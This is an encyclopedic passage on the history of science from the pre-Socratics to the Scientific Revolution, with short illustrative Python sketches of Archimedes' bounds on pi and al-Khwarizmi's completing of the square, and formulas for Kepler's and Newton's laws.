The earliest Greek philosophers, known as the pre-Socratics,[118] provided competing answers to the question found in the myths of their neighbors: "How did the ordered cosmos in which we live come to be?"[119] The pre-Socratic philosopher Thales (640–546 BCE) of Miletus,[120] identified by later authors such as Aristotle as the first of the Ionian philosophers,[2] postulated non-supernatural explanations for natural phenomena: for example, that land floats on water and that earthquakes are caused by the agitation of the water upon which the land floats, rather than by the god Poseidon.[121] Thales' student Pythagoras of Samos founded the Pythagorean school, which investigated mathematics for its own sake, and was the first to postulate that the Earth is spherical in shape.[122] Leucippus (5th century BCE) introduced atomism, the theory that all matter is made of indivisible, imperishable units called atoms. This was greatly expanded on by his pupil Democritus and later Epicurus.
Plato and Aristotle produced the first systematic discussions of natural philosophy, which did much to shape later investigations of nature. Their development of deductive reasoning was of particular importance and usefulness to later scientific inquiry. Plato founded the Platonic Academy in 387 BCE, whose motto was "Let none unversed in geometry enter here," and which turned out many notable philosophers. Plato's student Aristotle introduced empiricism and the notion that universal truths can be arrived at via observation and induction, thereby laying the foundations of the scientific method.[123] Aristotle also produced many biological writings that were empirical in nature, focusing on biological causation and the diversity of life. He made countless observations of nature, especially the habits and attributes of plants and animals on Lesbos, classified more than 540 animal species, and dissected at least 50.[124] Aristotle's writings profoundly influenced subsequent Islamic and European scholarship, though they were eventually superseded in the Scientific Revolution.[125][126]
Aristotle also contributed to theories of the elements and the cosmos. He believed that the celestial bodies (such as the planets and the Sun) had something called an unmoved mover that put them in motion. Aristotle tried to explain everything through mathematics and physics, but sometimes explained things such as the motion of celestial bodies through a higher power such as God. Aristotle did not have the technological advancements that would have explained the motion of celestial bodies.[127] In addition, Aristotle had many views on the elements. He believed that everything was derived from the elements earth, water, air, fire, and lastly the Aether. The Aether was a celestial element, and therefore made up the matter of the celestial bodies.[128] The elements of earth, water, air and fire were each derived from a combination of two of the characteristics hot, wet, cold, and dry, and all had their inevitable place and motion. The motion of these elements begins with earth being the closest to "the Earth," then water, air, fire, and finally Aether. In addition to the makeup of all things, Aristotle proposed theories as to why things did not return to their natural motion. He understood that water sits above earth, air above water, and fire above air in their natural state. He explained that although all elements must return to their natural state, the human body and other living things impose a constraint on the elements, thus not allowing the elements that make one who they are to return to their natural state.[129]
The important legacy of this period included substantial advances in factual knowledge, especially in anatomy, zoology, botany, mineralogy, geography, mathematics and astronomy; an awareness of the importance of certain scientific problems, especially those related to the problem of change and its causes; and a recognition of the methodological importance of applying mathematics to natural phenomena and of undertaking empirical research.[130][120] In the Hellenistic age scholars frequently employed the principles developed in earlier Greek thought, namely the application of mathematics and deliberate empirical research, in their scientific investigations.[131] Thus, clear unbroken lines of influence lead from ancient Greek and Hellenistic philosophers, to medieval Muslim philosophers and scientists, to the European Renaissance and Enlightenment, to the secular sciences of the modern day.
Neither reason nor inquiry began with the Ancient Greeks, but the Socratic method did, along with the idea of Forms, which gave rise to great advances in geometry, logic, and the natural sciences. According to Benjamin Farrington, former professor of Classics at Swansea University:
and again:
The astronomer Aristarchus of Samos was the first known person to propose a heliocentric model of the Solar System, while the geographer Eratosthenes accurately calculated the circumference of the Earth. Hipparchus (c. 190 – c. 120 BCE) produced the first systematic star catalog. The level of achievement in Hellenistic astronomy and engineering is impressively shown by the Antikythera mechanism (150–100 BCE), an analog computer for calculating the position of planets. Technological artifacts of similar complexity did not reappear until the 14th century, when mechanical astronomical clocks appeared in Europe.[133]
There was not a defined societal structure for healthcare during the age of Hippocrates.[134] At that time, society was not organized and knowledgeable, and people still relied on purely religious reasoning to explain illnesses.[134] Hippocrates introduced the first healthcare system based on science and clinical protocols.[135] Hippocrates' theories about physics and medicine helped pave the way in creating an organized medical structure for society.[135] In medicine, Hippocrates (c. 460–370 BCE) and his followers were the first to describe many diseases and medical conditions and developed the Hippocratic Oath for physicians, still relevant and in use today. Hippocrates' ideas are expressed in the Hippocratic Corpus, a collection containing descriptions of medical philosophies and of how disease and lifestyle choices reflect on the physical body.[135] Hippocrates influenced a Westernized, professional relationship between physician and patient.[136] Hippocrates is also known as "the Father of Medicine".[135] Herophilos (335–280 BCE) was the first to base his conclusions on dissection of the human body and to describe the nervous system. Galen (129 – c. 200 CE) performed many audacious operations, including brain and eye surgeries, that were not tried again for almost two millennia.
In Hellenistic Egypt, the mathematician Euclid laid down the foundations of mathematical rigor and introduced the concepts of definition, axiom, theorem and proof still in use today in his Elements, considered the most influential textbook ever written.[138] Archimedes, considered one of the greatest mathematicians of all time,[139] is credited with using the method of exhaustion to calculate the area under the arc of a parabola with the summation of an infinite series, and gave a remarkably accurate approximation of pi.[140] He is also known in physics for laying the foundations of hydrostatics and statics, and for the explanation of the principle of the lever.
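Archimedes' approximation of π proceeded by bounding the circle between inscribed and circumscribed regular polygons, repeatedly doubling the number of sides. The sketch below uses the modern algebraic recurrences for the polygon perimeters (Archimedes worked geometrically, not with these formulas), starting from hexagons for a circle of unit diameter:

```python
from math import sqrt

def archimedes_bounds(doublings):
    """Lower and upper bounds on pi from the perimeters of inscribed and
    circumscribed regular polygons around a circle of diameter 1,
    starting with hexagons and doubling the side count `doublings` times."""
    inscribed, circumscribed = 3.0, 2 * sqrt(3)
    for _ in range(doublings):
        # Harmonic mean gives the new circumscribed perimeter,
        # geometric mean the new inscribed one.
        circumscribed = 2 * circumscribed * inscribed / (circumscribed + inscribed)
        inscribed = sqrt(circumscribed * inscribed)
    return inscribed, circumscribed
```

Four doublings reach the 96-gon Archimedes used, reproducing bounds of roughly the quality of his famous 3 10/71 < π < 3 1/7.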
Theophrastus wrote some of the earliest descriptions of plants and animals, establishing the first taxonomy and looking at minerals in terms of their properties, such as hardness. Pliny the Elder produced one of the largest encyclopedias of the natural world in 77 CE, and was a successor to Theophrastus. For example, he accurately describes the octahedral shape of the diamond and notes that diamond dust is used by engravers to cut and polish other gems owing to its great hardness. His recognition of the importance of crystal shape is a precursor to modern crystallography, while his notes on other minerals presage mineralogy. He recognizes that other minerals have characteristic crystal shapes, but in one example confuses the crystal habit with the work of lapidaries. Pliny was also the first to show that amber is a resin from pine trees, on the evidence of insects trapped within it.[141][142]
The development of archaeology has its roots in history and with those who were interested in the past, such as kings and queens who wanted to show past glories of their respective nations. The 5th-century-BCE Greek historian Herodotus was the first scholar to systematically study the past and perhaps the first to examine artifacts.
During the rule of Rome, famous historians such as Polybius, Livy and Plutarch documented the rise of the Roman Republic and the organization and histories of other nations, while statesmen like Julius Caesar, Cicero, and others provided examples of the politics of the republic and Rome's empire and wars. The study of politics during this age was oriented toward understanding history, understanding methods of governing, and describing the operation of governments.
The Roman conquest of Greece did not diminish learning and culture in the Greek provinces.[143] On the contrary, the appreciation of Greek achievements in literature, philosophy, politics, and the arts by Rome's upper class coincided with the increased prosperity of the Roman Empire. Greek settlements had existed in Italy for centuries, and the ability to read and speak Greek was not uncommon in Italian cities such as Rome.[143] Moreover, the settlement of Greek scholars in Rome, whether voluntarily or as slaves, gave Romans access to teachers of Greek literature and philosophy. Conversely, young Roman scholars also studied abroad in Greece and, upon their return to Rome, were able to convey Greek achievements to their Latin readership.[143] And despite the translation of a few Greek texts into Latin, Roman scholars who aspired to the highest level did so using the Greek language. The Roman statesman and philosopher Cicero (106 – 43 BCE) was a prime example. He had studied under Greek teachers in Rome and then in Athens and Rhodes. He mastered considerable portions of Greek philosophy, wrote Latin treatises on several topics, and even wrote Greek commentaries on Plato's Timaeus as well as a Latin translation of it, which has not survived.[143]
In the beginning, support for scholarship in Greek knowledge was almost entirely funded by the Roman upper class.[143] There were all sorts of arrangements, ranging from a talented scholar being attached to a wealthy household to owning educated Greek-speaking slaves.[143] In exchange, scholars who succeeded at the highest level had an obligation to provide advice or intellectual companionship to their Roman benefactors, or even to take care of their libraries. The less fortunate or accomplished ones would teach their children or perform menial tasks.[143] The level of detail and sophistication of Greek knowledge was adjusted to suit the interests of their Roman patrons. That meant popularizing Greek knowledge by presenting information that was of practical value, such as medicine or logic (for courts and politics), while excluding subtle details of Greek metaphysics and epistemology. Beyond the basics, the Romans did not value natural philosophy and considered it an amusement for leisure time.[143]
Commentaries and encyclopedias were the means by which Greek knowledge was popularized for Roman audiences.[143] The Greek scholar Posidonius (c. 135 – c. 51 BCE), a native of Syria, wrote prolifically on history, geography, moral philosophy, and natural philosophy. He greatly influenced Latin writers such as Marcus Terentius Varro (116–27 BCE), who wrote the encyclopedia Nine Books of Disciplines, which covered nine arts: grammar, rhetoric, logic, arithmetic, geometry, astronomy, musical theory, medicine, and architecture.[143] The Disciplines became a model for subsequent Roman encyclopedias, and Varro's nine liberal arts were considered suitable education for a Roman gentleman. The first seven of Varro's nine arts would later define the seven liberal arts of medieval schools.[143] The pinnacle of the popularization movement was the Roman scholar Pliny the Elder (23/24–79 CE), a native of northern Italy, who wrote several books on the history of Rome and grammar. His most famous work was his voluminous Natural History.[143]
After the death of the Roman Emperor Marcus Aurelius in 180 CE, the favorable conditions for scholarship and learning in the Roman Empire were upended by political unrest, civil war, urban decay, and looming economic crisis.[143] In around 250 CE, barbarians began attacking and invading the Roman frontiers. These combined events led to a general decline in political and economic conditions. The living standards of the Roman upper class were severely impacted, and their loss of leisure diminished scholarly pursuits.[143] Moreover, during the 3rd and 4th centuries CE, the Roman Empire was administratively divided into two halves: the Greek East and the Latin West. These administrative divisions weakened the intellectual contact between the two regions.[143] Eventually, both halves went their separate ways, with the Greek East becoming the Byzantine Empire.[143] Christianity was also steadily expanding during this time and soon became a major patron of education in the Latin West. Initially, the Christian church adopted some of the reasoning tools of Greek philosophy in the 2nd and 3rd centuries CE to defend its faith against sophisticated opponents.[143] Nevertheless, Greek philosophy received a mixed reception from leaders and adherents of the Christian faith.[143] Some, such as Tertullian (c. 155 – c. 230 CE), were vehemently opposed to philosophy, denouncing it as heretical. Others, such as Augustine of Hippo (354–430 CE), were ambivalent and defended Greek philosophy and science as the best ways to understand the natural world, and therefore treated them as a handmaiden (or servant) of religion.[143] Education in the West began its gradual decline, along with the rest of the Western Roman Empire, due to invasions by Germanic tribes, civil unrest, and economic collapse. Contact with the classical tradition was lost in specific regions such as Roman Britain and northern Gaul, but continued to exist in Rome, northern Italy, southern Gaul, Spain, and North Africa.[143]
In the Middle Ages, classical learning continued in three major linguistic cultures and civilizations: Greek (the Byzantine Empire), Arabic (the Islamic world), and Latin (Western Europe).
The fall of the Western Roman Empire led to a deterioration of the classical tradition in the western part (or Latin West) of Europe during the 5th century. In contrast, the Byzantine Empire resisted the barbarian attacks and preserved and improved upon that learning.[144]
While the Byzantine Empire still held learning centers such as Constantinople, Alexandria and Antioch, Western Europe's knowledge was concentrated in monasteries until the development of medieval universities in the 12th century. The curriculum of monastic schools included the study of the few available ancient texts and of new works on practical subjects like medicine[145] and timekeeping.[146]
In the sixth century in the Byzantine Empire, Isidore of Miletus compiled Archimedes' mathematical works in the Archimedes Palimpsest, where all of Archimedes' mathematical contributions were collected and studied.
John Philoponus, another Byzantine scholar, was the first to question Aristotle's teaching of physics, introducing the theory of impetus.[147][148] The theory of impetus was an auxiliary or secondary theory of Aristotelian dynamics, put forth initially to explain projectile motion against gravity. It is the intellectual precursor to the concepts of inertia, momentum and acceleration in classical mechanics.[149] The works of John Philoponus inspired Galileo Galilei ten centuries later.[150][151]
During the Fall of Constantinople in 1453, a number of Greek scholars fled to northern Italy, where they fueled the era later commonly known as the "Renaissance", bringing with them a great deal of classical learning, including an understanding of botany, medicine, and zoology. Byzantium also gave the West important inputs: John Philoponus' criticism of Aristotelian physics, and the works of Dioscorides.[152]
This was the period (8th–14th century CE) of the Islamic Golden Age, when commerce thrived and new ideas and technologies emerged, such as the importation of papermaking from China, which made the copying of manuscripts inexpensive.
The eastward transmission of Greek heritage to Western Asia was a slow and gradual process that spanned over a thousand years, beginning with the Asian conquests of Alexander the Great in 335 BCE and continuing to the founding of Islam in the 7th century CE.[5] The birth and expansion of Islam during the 7th century was quickly followed by its Hellenization. Knowledge of Greek conceptions of the world was preserved and absorbed into Islamic theology, law, culture, and commerce, aided by the translation of traditional Greek texts and some Syriac intermediary sources into Arabic during the 8th–9th century.
Madrasas were centers for many different religious and scientific studies and were the culmination of different institutions, such as mosques based around religious studies, housing for out-of-town visitors, and finally educational institutions focused on the natural sciences.[153] Unlike Western universities, students at a madrasa would learn from one specific teacher, who would issue a certificate called an Ijazah at the completion of their studies. An Ijazah differs from a Western university degree in many ways: one being that it is issued by a single person rather than an institution, and another being that it is not an individual degree declaring adequate knowledge over broad subjects, but rather a license to teach and pass on a very specific set of texts.[154] Women were also allowed to attend madrasas, as both students and teachers, something not seen in Western higher education until the 1800s.[154] Madrasas were more than just academic centers. The Suleymaniye Mosque, for example, was one of the earliest and most well-known madrasas, built by Suleiman the Magnificent in the 16th century.[155] The Suleymaniye Mosque was home to a hospital and medical college, a kitchen, and a children's school, as well as serving as a temporary home for travelers.[155]
Higher education at a madrasa (or college) was focused on Islamic law and religious science, and students had to engage in self-study for everything else.[5] Despite the occasional theological backlash, many Islamic scholars of science were able to conduct their work in relatively tolerant urban centers (e.g., Baghdad and Cairo) and were protected by powerful patrons.[5] They could also travel freely and exchange ideas, as there were no political barriers within the unified Islamic state.[5] Islamic science during this time was primarily focused on the correction, extension, articulation, and application of Greek ideas to new problems.[5]
Most of the achievements by Islamic scholars during this period were in mathematics.[5] Arabic mathematics was a direct descendant of Greek and Indian mathematics.[5] For instance, what are now known as Arabic numerals originally came from India, but Muslim mathematicians made several key refinements to the number system, such as the introduction of decimal point notation. The mathematician Muhammad ibn Musa al-Khwarizmi (c. 780–850) gave his name to the concept of the algorithm, while the term algebra is derived from al-jabr, the beginning of the title of one of his publications.[156] Islamic trigonometry continued from the works of Ptolemy's Almagest and the Indian Siddhanta, to which they added trigonometric functions, drew up tables, and applied trigonometry to spheres and planes. Many of their engineers, instrument makers, and surveyors contributed books in applied mathematics. It was in astronomy that Islamic mathematicians made their greatest contributions. Al-Battani (c. 858–929) improved the measurements of Hipparchus, preserved in the translation of Ptolemy's Hè Megalè Syntaxis (The Great Treatise), translated as the Almagest. Al-Battani also improved the precision of the measurement of the precession of the Earth's axis. Corrections were made to Ptolemy's geocentric model by al-Battani, Ibn al-Haytham,[157] Averroes and the Maragha astronomers such as Nasir al-Din al-Tusi, Mu'ayyad al-Din al-Urdi and Ibn al-Shatir.[158][159]
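The "al-jabr" of al-Khwarizmi's title refers to manipulating equations such as x² + bx = c, which he solved rhetorically by completing the square; his worked example was x² + 10x = 39, with root 3. The sketch below restates that recipe in modern notation (the function name is my own, and only the positive root he sought is returned):

```python
from math import sqrt

def aljabr_root(b, c):
    """Positive root of x^2 + b*x = c by completing the square:
    (x + b/2)^2 = c + (b/2)^2, so x = sqrt(c + (b/2)^2) - b/2."""
    return sqrt(c + (b / 2) ** 2) - b / 2

# Al-Khwarizmi's worked example: x^2 + 10x = 39.
root = aljabr_root(10, 39)
```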
Scholars with geometric skills made significant improvements to the earlier classical texts on light and sight by Euclid, Aristotle, and Ptolemy.[5] The earliest surviving Arabic treatises were written in the 9th century by Abū Ishāq al-Kindī, Qustā ibn Lūqā, and (in fragmentary form) Ahmad ibn Isā. Later, in the 11th century, Ibn al-Haytham (known as Alhazen in the West), a mathematician and astronomer, synthesized a new theory of vision based on the works of his predecessors.[5] His new theory included a complete system of geometrical optics, which was set out in great detail in his Book of Optics.[5][160] His book was translated into Latin and was relied upon as a principal source on the science of optics in Europe until the 17th century.[5]
The medical sciences were prominently cultivated in the Islamic world.[5] The works of Greek medical theory, especially those of Galen, were translated into Arabic, and there was an outpouring of medical texts by Islamic physicians, which were aimed at organizing, elaborating, and disseminating classical medical knowledge.[5] Medical specialties started to emerge, such as those involved in the treatment of eye diseases such as cataracts. Ibn Sina (known as Avicenna in the West, c. 980–1037) was a prolific Persian medical encyclopedist[161] who wrote extensively on medicine,[162][163] with his two most notable works in medicine being the Kitāb al-shifāʾ ("Book of Healing") and The Canon of Medicine, both of which were used as standard medicinal texts in both the Muslim world and in Europe well into the 17th century. Amongst his many contributions are the discovery of the contagious nature of infectious diseases[162] and the introduction of clinical pharmacology.[164] Institutionalization of medicine was another important achievement in the Islamic world. Although hospitals as an institution for the sick emerged in the Byzantine Empire, the model of institutionalized medicine for all social classes was extensive in the Islamic empire and was scattered throughout. In addition to treating patients, physicians could teach apprentice physicians, as well as write and do research. The discovery of the pulmonary transit of blood in the human body by Ibn al-Nafis occurred in a hospital setting.[5]
Islamic science began its decline in the 12th–13th century, before the Renaissance in Europe, due in part to the Christian reconquest of Spain and the Mongol conquests in the East in the 11th–13th century. The Mongols sacked Baghdad, capital of the Abbasid Caliphate, in 1258, which ended the Abbasid empire.[5][165] Nevertheless, many of the conquerors became patrons of the sciences. Hulagu Khan, for example, who led the siege of Baghdad, became a patron of the Maragheh observatory.[5] Islamic astronomy continued to flourish into the 16th century.[5]
By the eleventh century, most of Europe had become Christian; stronger monarchies emerged; borders were restored; technological developments and agricultural innovations were made, increasing the food supply and population. Classical Greek texts were translated from Arabic and Greek into Latin, stimulating scientific discussion in Western Europe.[166]
In classical antiquity, Greek and Roman taboos had meant that dissection was usually banned, but in the Middle Ages medical teachers and students at Bologna began to open human bodies, and Mondino de Luzzi (c. 1275–1326) produced the first known anatomy textbook based on human dissection.[167][168]
As a result of the Pax Mongolica, Europeans, such as Marco Polo, began to venture further and further east. The written accounts of Polo and his fellow travelers inspired other Western European maritime explorers to search for a direct sea route to Asia, ultimately leading to the Age of Discovery.[169]
Technological advances were also made, such as the early flight of Eilmer of Malmesbury (who had studied mathematics in 11th-century England),[170] and the metallurgical achievements of the Cistercian blast furnace at Laskill.[171][172]
An intellectual revitalization of Western Europe started with the birth of medieval universities in the 12th century. These urban institutions grew from the informal scholarly activities of learned friars who visited monasteries, consulted libraries, and conversed with other fellow scholars.[173] A friar who became well-known would attract a following of disciples, giving rise to a brotherhood of scholars (or collegium in Latin). A collegium might travel to a town or request a monastery to host them. However, if the number of scholars within a collegium grew too large, they would opt to settle in a town instead.[173] As the number of collegia within a town grew, the collegia might request that their king grant them a charter that would convert them into a universitas.[173] Many universities were chartered during this period, with the first in Bologna in 1088, followed by Paris in 1150, Oxford in 1167, and Cambridge in 1231.[173] The granting of a charter meant that the medieval universities were partially sovereign and independent from local authorities.[173] Their independence allowed them to conduct themselves and judge their own members based on their own rules. Furthermore, as initially religious institutions, their faculties and students were protected from capital punishment (e.g., gallows).[173] Such independence was a matter of custom, which could, in principle, be revoked by their respective rulers if they felt threatened. Discussions of various subjects or claims at these medieval institutions, no matter how controversial, were done in a formalized way so as to declare such discussions as being within the bounds of a university and therefore protected by the privileges of that institution's sovereignty.[173] A claim could be described as ex cathedra (literally "from the chair", used within the context of teaching) or ex hypothesi (by hypothesis).
This meant that the discussions were presented as purely an intellectual exercise that did not require those involved to commit themselves to the truth of a claim or to proselytize. Modern academic concepts and practices such as academic freedom or freedom of inquiry are remnants of these medieval privileges that were tolerated in the past.[173]
The curriculum of these medieval institutions centered on the seven liberal arts, which were aimed at providing beginning students with the skills for reasoning and scholarly language.[173] Students would begin their studies with the first three liberal arts or Trivium (grammar, rhetoric, and logic), followed by the next four liberal arts or Quadrivium (arithmetic, geometry, astronomy, and music).[173][143] Those who completed these requirements and received their baccalaureate (or Bachelor of Arts) had the option to join the higher faculty (law, medicine, or theology), which would confer an LLD for a lawyer, an MD for a physician, or a ThD for a theologian.[173] Students who chose to remain in the lower faculty (arts) could work towards a Magister (or Master's) degree and would study three philosophies: metaphysics, ethics, and natural philosophy.[173] Latin translations of Aristotle's works such as De Anima (On the Soul) and the commentaries on them were required readings. As time passed, the lower faculty was allowed to confer its own doctoral degree, called the PhD.[173] Many of the Masters were drawn to encyclopedias and used them as textbooks. But these scholars yearned for the complete original texts of the Ancient Greek philosophers, mathematicians, and physicians such as Aristotle, Euclid, and Galen, which were not available to them at the time. These Ancient Greek texts were to be found in the Byzantine Empire and the Islamic World.[173]
Contact with the Byzantine Empire,[150] and with the Islamic world during the Reconquista and the Crusades, allowed Latin Europe access to scientific Greek and Arabic texts, including the works of Aristotle, Ptolemy, Isidore of Miletus, John Philoponus, Jābir ibn Hayyān, al-Khwarizmi, Alhazen, Avicenna, and Averroes. European scholars had access to the translation programs of Raymond of Toledo, who sponsored the 12th-century Toledo School of Translators from Arabic to Latin. Later translators like Michael Scotus would learn Arabic in order to study these texts directly. The European universities aided materially in the translation and propagation of these texts and started a new infrastructure which was needed for scientific communities. In fact, the European universities put many works about the natural world and the study of nature at the center of their curriculum,[174] with the result that the "medieval university laid far greater emphasis on science than does its modern counterpart and descendant."[175]
At the beginning of the 13th century, there were reasonably accurate Latin translations of the main works of almost all the intellectually crucial ancient authors, allowing a sound transfer of scientific ideas via both the universities and the monasteries. By then, the natural philosophy in these texts began to be extended by scholastics such as Robert Grosseteste, Roger Bacon, Albertus Magnus and Duns Scotus. Precursors of the modern scientific method, influenced by earlier contributions of the Islamic world, can be seen already in Grosseteste's emphasis on mathematics as a way to understand nature, and in the empirical approach admired by Bacon, particularly in his Opus Majus. Pierre Duhem's thesis is that the Condemnation of 1277, issued by Stephen Tempier, the Bishop of Paris, led to the study of medieval science as a serious discipline, "but no one in the field any longer endorses his view that modern science started in 1277".[176] However, many scholars agree with Duhem's view that the mid-late Middle Ages saw important scientific developments.[177][178][179]
The first half of the 14th century saw much important scientific work, largely within the framework of scholastic commentaries on Aristotle's scientific writings.[180] William of Ockham emphasized the principle of parsimony: natural philosophers should not postulate unnecessary entities, so that motion is not a distinct thing but is only the moving object,[181] and an intermediary "sensible species" is not needed to transmit an image of an object to the eye.[182] Scholars such as Jean Buridan and Nicole Oresme started to reinterpret elements of Aristotle's mechanics. In particular, Buridan developed the theory that impetus was the cause of the motion of projectiles, which was a first step towards the modern concept of inertia.[183] The Oxford Calculators began to mathematically analyze the kinematics of motion, making this analysis without considering the causes of motion.[184]
In 1348, the Black Death and other disasters brought a sudden end to philosophic and scientific development. Yet the rediscovery of ancient texts was stimulated by the Fall of Constantinople in 1453, when many Byzantine scholars sought refuge in the West. Meanwhile, the introduction of printing was to have great effect on European society. The facilitated dissemination of the printed word democratized learning and allowed ideas such as algebra to propagate more rapidly. These developments paved the way for the Scientific Revolution, where scientific inquiry, halted at the start of the Black Death, resumed.[185][186]
The renewal of learning in Europe began with 12th-century Scholasticism. The Northern Renaissance showed a decisive shift in focus from Aristotelian natural philosophy to chemistry and the biological sciences (botany, anatomy, and medicine).[187] Modern science in Europe was thus resumed in a period of great upheaval: the Protestant Reformation and Catholic Counter-Reformation; the discovery of the Americas by Christopher Columbus; the Fall of Constantinople; and the re-discovery of Aristotle during the Scholastic period. These events presaged large social and political changes, creating a suitable environment in which it became possible to question scientific doctrine, in much the same way that Martin Luther and John Calvin questioned religious doctrine. The works of Ptolemy (astronomy) and Galen (medicine) were found not always to match everyday observations. Work by Vesalius on human cadavers found problems with the Galenic view of anatomy.[188]
The discovery of Cristallo, which appeared out of Venice around 1450, also contributed to the advancement of science in the period. The new glass allowed for better spectacles and eventually led to the inventions of the telescope and microscope.
Theophrastus' work on rocks, Peri lithōn, remained authoritative for millennia: its interpretation of fossils was not overturned until after the Scientific Revolution.
During the Italian Renaissance, Niccolò Machiavelli established the emphasis of modern political science on direct empirical observation of political institutions and actors. Later, the expansion of the scientific paradigm during the Enlightenment further pushed the study of politics beyond normative determinations.[189] In particular, the study of statistics, to study the subjects of the state, has been applied to polling and voting.
In archaeology, the 15th and 16th centuries saw the rise of antiquarians in Renaissance Europe who were interested in the collection of artifacts.
The early modern period is seen as a flowering of the European Renaissance. There was a willingness to question previously held truths and search for new answers. This resulted in a period of major scientific advancements, now known as the Scientific Revolution, which led to the emergence of a New Science that was more mechanistic in its worldview, more integrated with mathematics, and more reliable and open, as its knowledge was based on a newly defined scientific method.[12][15][16][190] The Scientific Revolution is a convenient boundary between ancient thought and classical physics, and is traditionally held to have begun in 1543, when the books De humani corporis fabrica (On the Workings of the Human Body) by Andreas Vesalius and De Revolutionibus by the astronomer Nicolaus Copernicus were first printed. The period culminated with the publication of the Philosophiæ Naturalis Principia Mathematica in 1687 by Isaac Newton, representative of the unprecedented growth of scientific publications throughout Europe.
Other significant scientific advances were made during this time by Galileo Galilei, Johannes Kepler, Edmond Halley, William Harvey, Pierre Fermat, Robert Hooke, Christiaan Huygens, Tycho Brahe, Marin Mersenne, Gottfried Leibniz, Isaac Newton, and Blaise Pascal.[191] In philosophy, major contributions were made by Francis Bacon, Sir Thomas Browne, René Descartes, Baruch Spinoza, Pierre Gassendi, Robert Boyle, and Thomas Hobbes.[191] Christiaan Huygens derived the centripetal and centrifugal forces and was the first to transfer mathematical inquiry to describe unobservable physical phenomena. William Gilbert did some of the earliest experiments with electricity and magnetism, establishing that the Earth itself is magnetic.
The heliocentric astronomical model of the universe was refined by Nicolaus Copernicus. Copernicus proposed the idea that the Earth and all heavenly spheres, containing the planets and other objects in the cosmos, rotated around the Sun.[192] His heliocentric model also proposed that all stars were fixed, neither rotating on an axis nor in any motion at all.[193] His theory proposed the yearly rotation of the Earth and the other heavenly spheres around the Sun and was able to calculate the distances of planets using deferents and epicycles. Although these calculations were not completely accurate, Copernicus was able to understand the distance order of each heavenly sphere. The Copernican heliocentric system was a revival of the hypotheses of Aristarchus of Samos and Seleucus of Seleucia.[194] Aristarchus of Samos did propose that the Earth rotated around the Sun but did not mention anything about the other heavenly spheres' order, motion, or rotation.[195] Seleucus of Seleucia also proposed the rotation of the Earth around the Sun but did not mention anything about the other heavenly spheres. In addition, Seleucus of Seleucia understood that the Moon rotated around the Earth and could be used to explain the tides of the oceans, thus further demonstrating his understanding of the heliocentric idea.[196]
The Scientific Revolution continued into the Age of Enlightenment, which accelerated the development of modern science.
The heliocentric model revived by Nicolaus Copernicus was followed by the model of planetary motion given by Johannes Kepler in the early 17th century, which proposed that the planets follow elliptical orbits, with the Sun at one focus of the ellipse. In Astronomia Nova (A New Astronomy), the first two of the laws of planetary motion were demonstrated by analysis of the orbit of Mars. Kepler introduced the revolutionary concept of the planetary orbit. Because of his work, astronomical phenomena came to be seen as being governed by physical laws.[200]
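In modern notation (which Kepler himself did not use), the two laws demonstrated in Astronomia Nova, together with the third law he published later, can be sketched as:

```latex
% First law: an elliptical orbit with the Sun at one focus, written in
% polar coordinates (r, \theta) with eccentricity e and semi-latus rectum p.
r(\theta) = \frac{p}{1 + e \cos\theta}

% Second law: the line from the Sun to the planet sweeps out equal
% areas A in equal times.
\frac{dA}{dt} = \text{constant}

% Third law (published later, in Harmonices Mundi): the square of the
% orbital period T is proportional to the cube of the semi-major axis a.
T^2 \propto a^3
```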
A decisive moment came when "chemistry" was distinguished from alchemy by Robert Boyle in his work The Sceptical Chymist, in 1661, although the alchemical tradition continued for some time after his work. Other important steps included the gravimetric experimental practices of medical chemists like William Cullen, Joseph Black, Torbern Bergman and Pierre Macquer, and the work of Antoine Lavoisier ("father of modern chemistry") on oxygen and the law of conservation of mass, which refuted phlogiston theory. Modern chemistry emerged from the sixteenth through the eighteenth centuries through the material practices and theories promoted by alchemy, medicine, manufacturing and mining.[201][202][203]
In 1687, Isaac Newton published the Principia Mathematica, detailing two comprehensive and successful physical theories: Newton's laws of motion, which led to classical mechanics; and Newton's law of universal gravitation, which describes the fundamental force of gravity.
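Stated in modern notation (the Principia itself argues geometrically), the core of the two theories can be summarized as:

```latex
% Second law of motion: the net force on a body equals its mass times
% its acceleration.
\vec{F} = m\,\vec{a}

% Universal gravitation: the attractive force between masses m_1 and m_2
% separated by a distance r, with G the gravitational constant.
F = G\,\frac{m_1 m_2}{r^2}
```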
William Harvey published De Motu Cordis in 1628, which revealed his conclusions based on his extensive studies of vertebrate circulatory systems.[191] He identified the central role of the heart, arteries, and veins in producing blood movement in a circuit, and failed to find any confirmation of Galen's pre-existing notions of heating and cooling functions.[204] The history of early modern biology and medicine is often told through the search for the seat of the soul.[205] Galen, in his descriptions of his foundational work in medicine, presents the distinctions between arteries, veins, and nerves using the vocabulary of the soul.[206]
A critical innovation was the creation of permanent scientific societies and their scholarly journals, which dramatically sped the diffusion of new ideas. Typical was the founding of the Royal Society in London in 1660 and, in 1665, its journal the Philosophical Transactions of the Royal Society, the first scientific journal in English.[207] 1665 also saw the first journal in French, the Journal des sçavans. Drawing on the works[208] of Newton, Descartes, Pascal and Leibniz, science was on a path to modern mathematics, physics and technology by the time of the generation of Benjamin Franklin (1706–1790), Leonhard Euler (1707–1783), Mikhail Lomonosov (1711–1765) and Jean le Rond d'Alembert (1717–1783). Denis Diderot's Encyclopédie, published between 1751 and 1772, brought this new understanding to a wider audience. The impact of this process was not limited to science and technology, but affected philosophy (Immanuel Kant, David Hume), religion (the increasingly significant impact of science upon religion), and society and politics in general (Adam Smith, Voltaire).
Geology did not undergo systematic restructuring during the Scientific Revolution but instead existed as a cloud of isolated, disconnected ideas about rocks, minerals, and landforms long before it became a coherent science. Robert Hooke formulated a theory of earthquakes, and Nicholas Steno developed the theory of superposition and argued that fossils were the remains of once-living creatures. Beginning with Thomas Burnet's Sacred Theory of the Earth in 1681, natural philosophers began to explore the idea that the Earth had changed over time. Burnet and his contemporaries interpreted Earth's past in terms of events described in the Bible, but their work laid the intellectual foundations for secular interpretations of Earth history.
During the late 18th century, researchers such as Hugh Williamson[209] and John Walsh experimented on the effects of electricity on the human body. Further studies by Luigi Galvani and Alessandro Volta established the electrical nature of what Volta called galvanism.[210][211]
